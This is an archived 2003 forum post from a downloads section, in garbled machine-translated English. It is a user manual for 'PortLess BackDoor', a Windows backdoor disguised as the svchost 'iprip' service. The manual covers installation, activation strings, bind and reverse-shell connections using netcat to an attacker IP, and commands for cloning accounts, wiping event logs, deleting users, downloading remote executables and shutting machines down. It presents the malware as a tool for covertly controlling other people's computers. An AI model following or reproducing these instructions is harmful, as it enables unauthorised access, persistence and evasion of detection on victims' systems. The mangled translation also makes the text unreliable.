Portless Backdoor

GovernmentSecurity.org > The Archives > Public Downloads

wicked

Nov 18 2003, 08:52 PM

PortLessNew

Submits the time: 2003-09-24
Submits the user:W7c
Tool classification: Back door procedure
Movement platform: Windows
Tool size: 26,008 Bytes
Document MD5: 560a2e30c3b7fa4d4a2d4a7ae752b6d7
Tool origin: Wineggdrop hotmail

PortLess BackDoor V1.1

Uses svchost.exe to start, usually does not operate the port, may carry on the counter- connection the back door procedure (and small banyan tree's BITS is the identical type
Back door) Here first must send 12,000 minute thanks to bingle, he has not opened the svchostdll code, cannot have this back door
Presently, in the back door has a three minute code is the bingle code, therefore banner only can demonstrate PortLess the BackDoor such phrase Except has
Outside above characteristic, but also has joined the quite partial functions in this back door, joins the function respectively is:
1. Examination clone account
2. Clear diary
3. Clone account
4. The deletion system account (in constructs user Guest, Administrator all can delete)
5. Enumerates the system account
6.http downloading
7. Installs the terminal
8. Examines system all IP
9. Cancels the system
10. Closes the system power source
11. Again opens
12. Closure system
13. Examines the system information
14. The examination or revises the terminal port

How uses:
1. (Do not have to change name) portlessinst.exe and svchostdll.dll on passes to the system table of contents (in the %winnt%\system32 table of contents)
2.Portlessinst.exe -install ActiveString Password carries on the installment
The confirmation character string which after here ActiveString is connects which that system to open the port inputs
Here password is the use to is connecting you to connect when the port which on the back door opens needs to input password
3.net start iprip (start back door service)

Operating instructions that,
Character string uses which in the connection high quality meat machine any port input confirmation, that character string form is ActiveString|IP:Port, if you must use are
The reverse connection speech, ActiveString, IP, Port all must input; If only is wants in local to tie up into the port pattern, does not need to input IP, moreover must pay attention
Is two marks | and: In front of IP is |, in front of Port is: If you have made a mistake, the procedure is cannot distinguish, moreover ActiveString, IP and Port it
Is does not have any blank space If you have used order line of Portless V1.0, should have an understanding to this

Use example:
1. The supposition I already pass to IP on portlessinst.exe and svchostdll.dll am in 12.12.12.12 systems, this system
80 ports have open
2. Moves PortLessinst.exe -install wineggdrop test to install (can have information to demonstrate whether installs successfully)
3.net start iprip (saw back door started)

Example 1: Carries on to the connection
1.nc 12.12.12.1280
2. Saw after on continually, inputs wineggdrop:1982
3.nc 12.12.12.12 1982, sees "Enter Password: After "Banner, input password test, you landed

Example 2: Carries on the reverse connection (supposition my IP is 13.13.13.13, this is my male net IP)
1. In the oneself system, moves nc -l -p 12,345
2.nc 12.12.12.1280
3. Saw after on continually, inputs wineggdrop|13.13.13.13:12345
4. Then in moved in the nc -l -p 12,345 this cmd window, may see you landed

After lands, you certainly obtain cmd shell, if you have used winshell, wollf or wineggdropshell speech,
Cannot be strange to this kind of pattern back door After you land, if you input the help order, you can see may use very orders
The following can show these orders functions

The order explained that,
1.CheckClone function: Examination clone account
Example: CheckClone

2.CleanEvent function: Deletion system diary
Example: CleanEvent

3.Clone function: Clone account
Usage: The Clone account must clone account password
Example: Clone Admin Guest test
Above the example can clone Guest to Admin that user in, and the Guest password is changed test

4.DelUser function: In deletes a user (this function to be allowed to delete constructs user, therefore do not have casually to use)
Usage: DelUser user
Example: Deluser Test
Above the example can the test this user deletion

5.Exit function: Withdraws from the back door
Example: Exit

6.http://ip/filename preservation filename function: Downloading procedure
Example?Http://11.11.11.11/a.exe a.exe
Example?Http://www.mysite.com/a.exe a.exe
Example? Http://www.mysite.com:81/a.exe a.exe

7.Installterm port function: In has not installed the terminal service win in the 2k service version system to install the terminal service, after again opens the system only then to become effective
Usage: After Installterm 3,345 (opens the terminal to be able again to turn on 3,345 that ports, uses terminal port whether quilt which before this order first has a look you to have to define
Other procedures use)

8.ListIP function: Display system all IP
Example: ListIP

9.Logoff function: Cancels the system
Example: Logoff

10.PowerOff function: Closes the power source
Example: PowerOff

11.Reboot function: Again opens the system
Example: Reboot

12.ShutDown function: Closure system
Example: ShutDown

13.Shell function: Obtains Cmd Shell
Example: Shell
Obtains Shell to have to withdraw, inputs exit to be able to withdraw from the back door

The 14.Sysinfo function showed that, Examined the system the information (quite is detailed)
Example: Sysinfo

15.TerminalPort function: Examines the terminal service port
Example: TerminalPort

16.TerminalPort new port function: Reset terminal service port
Example: TerminalPort new port
Attention: The new port must be the legitimate port, otherwise the procedure can return to the mistake.

How deletes this back door:
1.net stop iprip (possibly must wait one to be able to possess thing all to release, if is not forcefully stops, can have Quit in svclog.log the information)
2.sc delete iprip or portlessinst -uninstall, suggested uses portlessinst the -unstall order to delete, because
Speech deletes which with this order, can preserve ActiveString and password all deletes in the registration table

How changes ActiveString and Password
1.Portlessinst -set new ActiveString new password
2. Again opened the back door service or opens the system again only then since birth the effect

Other explained that,
1. The back door only can use in win 2k/xp/2003
2. Uses the reverse connection, accepts this reverse connection the system to have to have male net IP
3. The back door starts when can produce svclog.log the document, this is records the back door to make a mistake the information and the start information, the back door starts when
Can the old svclog.log deletion, if you could not use this back door, could have a look in svclog.log the information, or was allowed to see
Was where has made a mistake
4. No time test, therefore if has bug, is not strange
5.ActiveString and the Password greatest length all is 64 characters

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.